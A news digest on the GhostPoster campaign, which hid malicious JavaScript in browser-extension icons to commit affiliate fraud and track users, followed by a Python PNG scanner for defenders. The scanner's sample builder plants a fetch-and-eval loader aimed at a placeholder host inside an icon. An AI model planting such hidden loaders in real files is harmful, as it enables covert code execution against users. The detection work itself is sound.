GhostPoster Malware: Browser Extension Threat Evades Detection for Years | Quick Digest
A sophisticated malware campaign named GhostPoster has infiltrated Chrome, Firefox, and Edge stores, infecting over 840,000 users. It operates by hiding malicious code within extension icons, facilitating affiliate fraud and extensive user tracking. The threat remained undetected for over four years, highlighting advanced evasion tactics.
Malware concealed within innocent-looking browser extension icon files via steganography.
Over 840,000 users across Chrome, Firefox, and Edge browsers were compromised.
The operation ran undetected since at least 2020, demonstrating advanced evasion techniques.
Malware actively hijacks affiliate links, injects tracking code, and disables browser security.
Discovered initially by Koi Security and further detailed in reports by LayerX.
Extensions, now removed, still pose a risk to users who previously installed them.
A significant and long-running malware operation, dubbed 'GhostPoster,' has been exposed, revealing a sophisticated campaign that infected over 840,000 users across Google Chrome, Mozilla Firefox, and Microsoft Edge browsers. The campaign was initially identified by Koi Security researchers in December 2025, with a subsequent, more expansive report from browser security firm LayerX in January 2026.
The GhostPoster malware distinguishes itself through its innovative use of steganography, embedding malicious JavaScript code directly within the seemingly harmless PNG image files used as extension icons. This technique allowed the malware to bypass traditional static analysis tools and remain undetected within official browser extension stores for an extended period, with some malicious extensions active since as early as 2020.
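The page does not describe how the script is encoded inside the icon, so the following is an added triage check, not GhostPoster's code or the researchers' tooling: it walks a PNG's chunk list and flags two common smuggling spots (bytes appended after IEND, and script-like text in textual/profile chunks, including zlib-compressed zTXt/iCCP). The sample icon, the `cdn.example` URL and the token heuristic are constructed for the demonstration.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Constructed heuristic: tokens that have no business inside an icon file
JS_PATTERN = re.compile(rb"function\s*\(|=>|eval\(|chrome\.|browser\.|document\.|fetch\(")

def _views(ctype, body):
    """Yield the raw chunk body and, for zTXt/iCCP, its inflated zlib payload."""
    yield body
    if ctype in (b"zTXt", b"iCCP"):
        nul = body.find(b"\x00")  # layout: keyword \0 method(1 byte) zlib stream
        if nul >= 0:
            try:
                yield zlib.decompress(body[nul + 2:])
            except zlib.error:
                pass

def scan_png(data):
    """Walk the chunk list; report bytes after IEND and script-like text in any chunk."""
    report = {"valid_png": data.startswith(PNG_SIG), "trailing_bytes": 0, "suspicious": []}
    if not report["valid_png"]:
        return report
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + body + 4 CRC
        if ctype != b"IDAT" and any(JS_PATTERN.search(v) for v in _views(ctype, body)):
            report["suspicious"].append(ctype.decode("ascii", "replace"))
        if ctype == b"IEND":
            report["trailing_bytes"] = len(data) - pos  # a clean icon ends at IEND
            break
    return report

def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_sample_icon(hide_script):
    """Constructed 1x1 RGB PNG; optionally smuggles a script in a zTXt chunk and after IEND."""
    chunks = [_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))]
    trailer = b""
    if hide_script:
        script = b"(function(){fetch('https://cdn.example/p').then(r=>r.text()).then(eval)})();"
        chunks.append(_chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(script)))
        trailer = b"\n//appended\n" + script
    chunks.append(_chunk(b"IDAT", zlib.compress(b"\x00\xff\xff\xff")))  # filter byte + white pixel
    return PNG_SIG + b"".join(chunks) + _chunk(b"IEND", b"") + trailer
```

Run `scan_png` over every icon in an unpacked extension directory; a non-zero `trailing_bytes` or any entry in `suspicious` is grounds for manual review, while a clean result only rules out these two hiding places, not pixel-level encodings.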
Once installed, the malicious extensions, often masquerading as legitimate tools like VPNs, translation utilities, or ad blockers, would initiate a multi-stage infection process. The malware employs delayed execution, waiting between 48 hours and five days before communicating with its command-and-control servers and only fetching payloads intermittently (10% of the time) to further evade detection. Its capabilities include comprehensive monitoring of browsing activity, stripping critical browser security headers, hijacking affiliate marketing links for financial gain through ad and click fraud, injecting fraudulent iframes, and even programmatically solving CAPTCHA challenges to maintain operations.
The researchers noted that the campaign spanned at least 17 extensions in its initial phase, affecting over 50,000 Firefox users, with later findings identifying additional extensions and a significantly larger user base. While Google has confirmed the removal of the identified extensions from the Chrome Web Store, and they are no longer available on Mozilla's and Microsoft's platforms, users who previously installed these malicious add-ons remain at risk and are advised to manually remove them. The persistent nature and advanced evasion tactics of GhostPoster highlight the evolving threats within browser extension ecosystems, making robust cybersecurity practices essential for all internet users.